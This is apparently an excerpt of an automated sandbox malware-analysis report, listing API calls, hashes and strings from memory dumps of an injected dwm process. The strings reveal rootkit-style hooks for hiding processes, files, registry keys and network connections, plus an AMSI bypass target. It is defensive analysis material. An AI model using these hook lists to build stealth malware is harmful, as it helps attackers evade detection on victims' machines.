                                                    • Part of subcall function 00000262F1CA1E74: TlsAlloc.KERNEL32 ref: 00000262F1CA2079
                                                    • Part of subcall function 00000262F1CA1E74: TlsAlloc.KERNEL32 ref: 00000262F1CA2085
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                  • String ID:
                                                  • API String ID: 2779030803-0
                                                  • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction ID: 7fff679199f1ecd37278205970ca41dcd2c70594ea1e970d41fe7a7b43ecd5d2
                                                  • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction Fuzzy Hash: 5C115E71E10E71C2FBA2D7A1A97E39D22B0AB94745FD06139D50681DD1EF7BC85C8603

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                  • String ID:
                                                  • API String ID: 3733156554-0
                                                  • Opcode ID: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
                                                  • Instruction ID: bd65f0c0dfe88095e0bd2db25d9ad990b675354b195ed4d64c5b7365e349397c
                                                  • Opcode Fuzzy Hash: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
                                                  • Instruction Fuzzy Hash: B1F0F476228F54C0D6219B06F46934AA7B1F388BD4F944125AA8D47FE9CA3AC6888F01

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00000262F1CA1724: GetProcessHeap.KERNEL32 ref: 00000262F1CA172F
                                                    • Part of subcall function 00000262F1CA1724: HeapAlloc.KERNEL32 ref: 00000262F1CA173E
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA17AE
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA17DB
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.ADVAPI32 ref: 00000262F1CA17F5
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA1815
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.KERNELBASE ref: 00000262F1CA1830
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA1850
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.ADVAPI32 ref: 00000262F1CA186B
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA188B
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.ADVAPI32 ref: 00000262F1CA18A6
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA18C6
                                                  • SleepEx.KERNELBASE ref: 00000262F1CA1BDF
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.ADVAPI32 ref: 00000262F1CA18E1
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA1901
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.ADVAPI32 ref: 00000262F1CA191C
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA193C
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.ADVAPI32 ref: 00000262F1CA1957
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA1977
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.ADVAPI32 ref: 00000262F1CA1992
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.KERNELBASE ref: 00000262F1CA199C
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
                                                  • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction ID: ece9f4fb75c60a0ffb29cf2b96853b0ceff0fece9c3269e6bc48935afae10d06
                                                  • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction Fuzzy Hash: 27314179300E61C1FB529B67D56C36923B5EB44FC4F8854319E0A87FD6EE26C8588316

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 408 262f1caf370-262f1caf39f VirtualProtect
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction ID: f2e922bfa1bbf5c3a7d3d203004e5cb1834a0676a9aecda2eaacdf51f705b8f8
                                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction Fuzzy Hash: E5D0C935731950C3E300DB12E8497966238B398701FC04015E94982A948B7DC659CB51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 409 262f1d0f370-262f1d0f39f VirtualProtect
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction ID: f00f757df4a10957ec3c18d2ce7bea6e40a0d13cbce99772594dd902569dc966
                                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction Fuzzy Hash: D7D0C9357319A0C3F304DB52D849B956278B398701FC04005E94992A948B7DC259CB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 410 262f1d3f370-262f1d3f39f VirtualProtect
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448872342.00000262F1D31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D30000, based on PE: true
                                                  • Associated: 00000012.00000002.3448816247.00000262F1D30000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448971011.00000262F1D45000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449077595.00000262F1D50000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449181058.00000262F1D52000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449289748.00000262F1D59000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d30000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction ID: 43e1f4af8a9e6e3e10bd71d104b3159c7a2b8a9c3119750c479f742642c2db56
                                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction Fuzzy Hash: 8DD0C935731960C3E3049B12D84A7966238B398701FC04005E94992A949B7DC259CB50
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: 69f3d3eaa3d6884608b45df35872c1e03a97c7c2da1dea68ca9ba8341c18b76f
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: 5AB17B72215AA0C2EB668F66D42D7A9A3B4F744F84F946026EE0993FD5DE36CC48C341
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: 9208176f5fd25b37848e597e8bf149f358517d6189f1a7bc1efe39fde8843191
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: C3B17E72210EA0EAEB698F66D54C7A9A3B4F744F84F945016EE0953F98DF36CD88C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448872342.00000262F1D31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D30000, based on PE: true
                                                  • Associated: 00000012.00000002.3448816247.00000262F1D30000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448971011.00000262F1D45000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449077595.00000262F1D50000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449181058.00000262F1D52000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449289748.00000262F1D59000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d30000_dwm.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: e46fba9edd0b816e117b2557f57403e9d5e8241ef2745bd9b2dfa81438edb6b6
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: FAB17D36210EA0E2EB688F66D64D7A9A3B4F744B84F849016EE4D57F94DF36CD88C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: de3898a97a84e47f03e0277eae2282252cdc9e1c4227fc05dafa4fd36ecf113e
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: EA313672205F90CAEB60CF61E8587EE6374F784748F84402ADA4E87BD9DF39C6488B11
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: 3af119f925bd1c4d657a86cb189ef0273533cc4d83509680832d29b866cbf17a
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: 63313972605F90C6FB608F61E8883EE6374F789744F84402ADA4E57B99DF79C648CB10
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: 242f319d45f79e06df35416f8a483474c1987fa3c154e71153dec5f1e2001d11
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: 59414836214F90C6EB61CB25E8583AA73B4F788754F900225EB8D86BD9DF39C559CB01
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: cb444bd1594bb2f39c8282772ae346ffb350d46afaddabb2239a75e745ec8411
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: 41416D36214F90C6EB60CF25E84839E73B4F789B94F900125EA9D57BA9DF39C559CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: f60f77df28b5db655b44b70f9761e20235b6923ef2c97fa86e7d3c2f494fdfca
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: FDA13932704EA0C9FB22DB75A46C3BD6BB0E741B94F944135DE8927EE5CA3AC449C702
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: 5ec427f1e28192e5f670de6fda6fd69ee977d714a9bdbf4581e441d139128064
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: F1A10632704FA0C9FB20DB75A48C3AE6BB0E785F94F944116DE9827E9DCA7AC049C704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3572789727
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: e403f0359fa1c4c32d5c259256a382749dc8a7b7df2545cfba0458969aaa7737
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: A071D776310E75C6FB10DFA5E89C69923B8FB89B88F801211DA4D57F68DE3AC548C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 37c37c4d0f6f8019c0686828f4b48498074dac16856741b909d659c60ed972ee
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: 5851BE74101EAAE6FB04DFA8EC4D7D42B35B748B84FD04527940963D79DE3A869EC340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
